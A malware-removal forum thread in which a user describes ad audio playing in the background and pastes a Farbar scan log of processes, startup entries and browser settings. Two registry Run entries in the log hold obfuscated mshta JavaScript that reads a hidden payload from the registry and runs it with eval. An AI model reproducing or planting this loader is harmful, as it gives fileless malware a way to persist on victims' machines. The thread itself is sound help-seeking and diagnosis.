Inactive-A Windows Explorer/Host Processes For Windows Playing Muted Adds

[Domo124]

I installed java to run a program that required it. It installed some malware, that I believe have been removed from my computer by Adware Cleaner.

I have tried rkiller and Iexplore but both found nothing wrong. I tried using Blitzbank with the script provided to another person having problems on a forum on techspot, page provided below, and I got a failed message when imy computer rebooted. Any help is greatly appreciated.




page will be provi https://www.techspot.com/community/topics/audio-ads-playing-on-windows-7-background.199113/,

 

[Domo124]

I have also removed the Java and any downloads made that day.

 

[Broni]

Welcome aboard

Please, complete all steps listed here: https://www.techspot.com/community/...lware-removal-preliminary-instructions.58138/
Make sure, you PASTE all logs. If some log exceeds 50,000 characters post limit, split it between couple of replies.
Attached logs won't be reviewed.

Please, observe following rules:

• Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
• If you're stuck, or you're not sure about certain step, always ask before doing anything else.
• Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
• Never run more than one scan at a time.
• Keep updating me regarding your computer behavior, good, or bad.
• The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
• If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
• I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

 

[Domo124]

Here are the two files you have asked for:

 

[Broni]

Please observe forum rules.
All logs have to be pasted not attached.

 

[Domo124]

My apologies, here is the FRST.txt;

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:13-07-2015
Ran by J. Powers (administrator) on DEMON-PC on 17-07-2015 18:02:50
Running from C:\Users\J. Powers\Downloads
Loaded Profiles: UpdatusUser & J. Powers (Available Profiles: UpdatusUser & J. Powers)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ATKOSD.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\WDC.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(ASUS) C:\Program Files\ASUS\P4G\BatteryLife.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(ASUS) C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnSrv.exe
() C:\Program Files\ASUS\Rotation Desktop for G Series\AsusUacSvc.exe
(ASUS) C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnWMI.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\ismagent.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Fan Filter Checker\FanChkSrv.exe
() C:\Users\J. Powers\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe
(ooVoo LLC) C:\Program Files (x86)\ooVoo\ooVoo.exe
(VIA) C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() C:\Program Files (x86)\Roxio\CinePlayer\5.0\CPMonitor.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUS) C:\Windows\AsScrPro.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe
(ASUSTeK) C:\Windows\SysWOW64\ACEngSvr.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Eastman Kodak Company) C:\Program Files (x86)\Kodak\AiO\Center\EKAiOHostService.exe
(Eastman Kodak Company) C:\Program Files (x86)\Kodak\AiO\StatusMonitor\EKPrinterSDK.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Razer Inc.) C:\Program Files (x86)\Razer\RzWizard\RzWizardService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe
(VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.5.495.0\McCSPServiceHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\McAfee\MAT\McPvTray.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SndVol.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\saUI.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_209.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_209.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AtherosBtStack] => CK.EXE"
HKLM\...\Run: [AthBtTray] => Y.EXE"
HKLM\...\Run: [AmIcoSinglun64] => MICOSINGLUN64.EXE
HKLM\...\Run: [SynTPEnh] => .EXE
HKLM\...\Run: [AdobeAAMUpdater-1.0] => RTUPUTILITY.EXE"
HKLM\...\Run: [Nvtmru] => TE CORE\NVTMRU.EXE"
HKLM\...\Run: [ShadowPlay] => RT
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [3331312 2012-02-17] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [5138032 2012-03-30] (VIA)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-06] (Intel Corporation)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [322176 2012-02-16] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe [174720 2011-10-24] (ASUS)
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUS)
HKLM-x32\...\Run: [Wireless Console 3] => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [2321072 2012-02-02] (ASUSTeK Computer Inc.)
HKLM-x32\...\Run: [CPMonitor] => C:\Program Files (x86)\Roxio\CinePlayer\5.0\CPMonitor.exe [84464 2011-05-22] ()
HKLM-x32\...\Run: [ACMON] => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [102568 2012-02-06] (ASUS)
HKLM-x32\...\Run: [ASUS Screen Saver Protector] => C:\Windows\AsScrPro.exe [3058304 2012-08-01] (ASUS)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe [107816 2010-08-20] (CyberLink)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [616272 2015-05-13] (McAfee, Inc.)
HKLM-x32\...\Run: [AdobeCS5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [402432 2010-07-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [976320 2009-12-03] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [RzWizard] => C:\Program Files (x86)\Razer\RzWizard\RzWizard.exe [254464 2014-10-19] (Razer Inc.)
HKLM-x32\...\Run: [LifeCam] => C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [**94ee119e<*>] => mshta javascript:ScucY2w="i8IlP6g";T9L5=new%20ActiveXObject("WScript.Shell");ijGN50iRR="plWHz";QiH5H=T9L5.RegRead("HKLM\\software\\Wow6432Node\\e6a2881f\\84f4448c");naAD65DL="Vq";eval(QiH5H);yDe5xQKsv (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [334896 2015-06-08] (Oracle Corporation)
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
HKLM\...\Policies\Explorer\Run: [] =>
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [Epson Stylus NX420(Network)] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIGCA.EXE [224768 2009-09-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [Amazon Cloud Player] => C:\Users\J. Powers\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe [3145536 2013-12-12] ()
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [28782208 2015-06-02] (Skype Technologies S.A.)
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [ooVoo.exe] => C:\Program Files (x86)\ooVoo\oovoo.exe [36207136 2015-02-08] (ooVoo LLC)
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Run: [**94ee119e<*>] => mshta javascript:d9ZJuvP3dy="iQk";cu56=new%20ActiveXObject("WScript.Shell");LFWDTEi1="Fu";FLm1w=cu56.RegRead("HKCU\\software\\e6a2881f\\84f4448c");WG5yxTq="zGvYJl4";eval(FLm1w);Xly5cs5e="gLH"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Policies\Explorer: [NoFolderOptions] 0
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\MountPoints2: {619d0889-2d0a-11e2-85d9-e0b9a5fb19ef} - F:\setup.exe -a
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\MountPoints2: {ee347677-31af-11e3-ad2a-e0b9a5fb19ef} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-18\...\RunOnce: [KodakHomeCenter] => C:\Program Files (x86)\Kodak\AiO\Center\AiOHomeCenter.exe [2236792 2013-03-15] (Eastman Kodak Company)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AsusVibeLauncher.lnk [2012-02-17]
ShortcutTarget: AsusVibeLauncher.lnk -> C:\Program Files (x86)\ASUS\AsusVibe\AsusVibeLauncher.exe (ASUSTeK Computer Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2014-02-16]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3654736093-338424075-1572945638-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP06&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP06&src=IE-SearchBox
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKLM -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = http://us.yhs4.search.yahoo.com/yhs...0LzuyE&cr=997119123&a=wny_ir_15_25&os=Windows 7 Home Premium&p={searchTerms}
SearchScopes: HKLM -> {c9ab6446-7efc-47fe-966c-dc54324eff9f} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP06&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=ASUTDF&pc=NP06&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> DefaultScope {42740267-7172-4304-B00A-DC95DDB739FD} URL = https://search.yahoo.com/search?fr=mcafee&type=C011US105D20140705&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {29E17992-E3A4-40E4-A255-D85843B37E03} URL = http://www.dregol.com/results.php?f...0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {42740267-7172-4304-B00A-DC95DDB739FD} URL = https://search.yahoo.com/search?fr=mcafee&type=C011US105D20140705&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = http://us.yhs4.search.yahoo.com/yhs...0LzuyE&cr=997119123&a=wny_ir_15_25&os=Windows 7 Home Premium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {c9ab6446-7efc-47fe-966c-dc54324eff9f} URL = http://us.yhs4.search.yahoo.com/yhs...zyzy&cr=1654865247&a=wncy_ir_15_25&os=Windows 7 Home Premium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3654736093-338424075-1572945638-1002 -> {F830EA36-C432-49D1-BA04-79A5FC51071F} URL = https://www.google.com/search?q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-05-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-05-28] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-05-28] (Microsoft Corporation)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll [2010-03-27] (Adobe Systems, Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll [2014-04-09] (McAfee, Inc.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\ssv.dll [2015-07-14] (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-12-29] (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-05-27] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\jp2ssv.dll [2015-07-14] (Oracle Corporation)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll [2010-03-27] (Adobe Systems, Inc.)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-07-03] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-07-03] (McAfee, Inc.)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-07-03] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-07-03] (McAfee, Inc.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2015-05-13] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2015-05-13] (McAfee, Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{6422DE2B-80C0-47C3-B076-CDC7E8B1096D}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{A809FC38-77AF-45EB-8338-30872558E6F9}: [DhcpNameServer] 192.168.1.1
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955
FF DefaultSearchEngine.US: Google
FF Homepage: https://google.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_209.dll [2015-07-14] ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\system32\npDeployJava1.dll [2013-08-25] (Oracle Corporation)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-05-13] ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-07-14] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2015-07-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2015-07-14] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2015-05-13] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2013-07-11] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-11-11] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-11-11] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-17] (Google Inc.)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
